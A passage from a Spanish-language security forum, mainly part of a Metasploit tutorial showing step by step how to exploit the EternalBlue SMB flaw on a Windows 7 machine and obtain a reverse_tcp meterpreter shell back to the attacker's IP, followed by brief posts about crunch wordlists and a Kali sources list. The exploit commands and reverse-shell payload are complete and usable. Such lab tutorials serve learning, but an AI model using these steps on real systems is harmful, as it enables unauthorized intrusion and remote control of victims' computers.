Como podemos ver el resultado nos dice que es un Windows 7 y que el equipo es VULNERABLE. Ahora nos queda ejecutar nuestro metasploit y buscar enternablue, para eso ocuparemos el comando search.

Código: php
search eternablue




Nos aparecerá dos módulos que sería el auxiliar que es lo mismo que hicimos en nmap para identificar si la máquina de la víctima es vulnerable. Y el otro modulo es el exploit.

Para ingresar al módulo del exploit de enternablue se ocupar el comando use

Código: php
use exploit/windows/smb/ms17_010_eternalblue




Ahora nos falta setear y colocaremos la IP de nuestra victima

Código: php
set RHOST 192.168.0.100


Ahora crearemos un payload para obtener el meterpreter. Si nosotros no creamos el payload al momento de atacar como resultado obtendremos el cmd de la máquina de la víctima y en cambio sí obtenernos un meterpreter podemos hacer un fin de cosas como descarga archivo, subir archivos, capturar pantalla, etc....

Código: php
set payload windows/x64/meterpreter/reverse_tcp


Y por finalizar nos queda LHOST que sería la IP de nuestra máquina. Con el comando ifconfig sabremos cual es nuestra IP.



En mi caso la IP que tengo seria 192.168.0.101   

Código: php
set LHOST 192.168.0.101


Escribimos show options    



Ahora nos falta ejecutar para eso escribimos:   

Código: php
exploit


Y listo nuestro exploit se estará ejecutado y obtendremos el meterpreter que tanto deseamos.



Para finalizar el post si escriben help podrán ver todo el comando del meterpreter. El siguiente post estaré hablado todo el comando de meterpreter.



No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
Curso Metasploit - Part. 3 - Como obteber un meterpreter con EternalBlue
No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
No tienes permitido ver los links. Registrarse o Entrar a mi cuenta

#58
Hola a todos :D

Soy de chile y escribo desde el fin del mundo PUNTA ARENAS. Donde la gente creen que tenemos pinguino de gato y focas como perros.







#59
Dudas y pedidos generales / Re:Diccionarios con crunch
Diciembre 13, 2017, 09:00:40 PM
Hola @No tienes permitido ver los links. Registrarse o Entrar a mi cuenta te recomiendo que veas este post.

No tienes permitido ver los links. Registrarse o Entrar a mi cuenta

esta muy completo sobre crunch

Saludos.
#60
hola @No tienes permitido ver los links. Registrarse o Entrar a mi cuenta

aca te dejo el sources.list

deb No tienes permitido ver los links. Registrarse o Entrar a mi cuenta kali-rolling main contrib non-free
deb-src No tienes permitido ver los links. Registrarse o Entrar a mi cuenta kali-rolling main contrib non-free

saludos.